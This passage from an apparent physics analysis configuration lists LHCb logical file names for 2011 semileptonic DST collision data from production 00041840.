'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031383_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031197_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036111_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068014_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032509_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022964_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031995_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043125_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006030_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049291_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050432_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011683_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057567_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049714_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055939_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061784_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003254_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027510_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001285_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027803_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023475_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019939_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019302_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039583_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000901_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010502_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038763_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022517_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068615_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050926_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014649_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065788_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009093_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021128_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031491_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029772_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004003_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021968_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012566_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013729_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050822_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037408_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013541_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032891_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058103_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003906_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066708_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069458_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003685_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053202_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064834_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043485_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066856_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049755_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052757_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028506_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039546_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032693_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061236_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022375_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023004_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046324_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049039_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058384_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062732_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052391_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014548_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068779_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011846_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020206_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027644_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063673_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057187_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020514_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058544_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039512_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062783_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007374_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054358_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043180_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018923_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013410_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044386_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057294_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059750_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044316_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057246_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016695_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003619_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048968_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006722_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048770_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050318_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018978_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027819_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041597_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004509_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030086_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006106_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039361_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029415_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050372_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052626_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043310_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006151_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006229_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007029_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001284_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000168_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025988_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067754_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024928_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000154_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063444_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033214_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063357_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024591_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066712_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065785_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033193_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026412_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059842_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026995_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043969_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028325_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057577_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068759_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060175_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015408_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043704_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006257_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044138_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059719_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014419_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060267_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019733_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020336_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056031_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002358_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050347_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000241_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017277_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007118_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010459_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032890_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066529_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064458_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036637_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017116_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057256_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062744_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056380_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027250_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059119_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039684_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032214_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060805_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036129_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059437_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052518_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006573_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026110_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025584_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042340_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062730_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061988_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014849_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016958_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040853_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060900_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025344_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026953_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037187_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048213_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018517_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039888_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003454_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031682_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000112_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007428_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062621_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050709_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006432_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000211_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063917_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068698_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058611_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033524_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057580_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019680_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046753_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007254_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040400_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015113_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005411_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004817_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034633_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021776_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050525_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011123_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008764_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006383_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052179_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056155_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057429_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051118_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014916_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057664_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006182_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056229_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050470_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040714_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024657_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039993_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020063_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004908_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057135_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062701_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050359_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028570_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040398_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036769_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024964_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007912_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039229_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054194_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031697_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050766_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045907_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057096_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063291_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062064_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034635_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023691_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062695_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001781_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056420_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058374_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023809_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035092_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043483_1.semileptonic.dst',
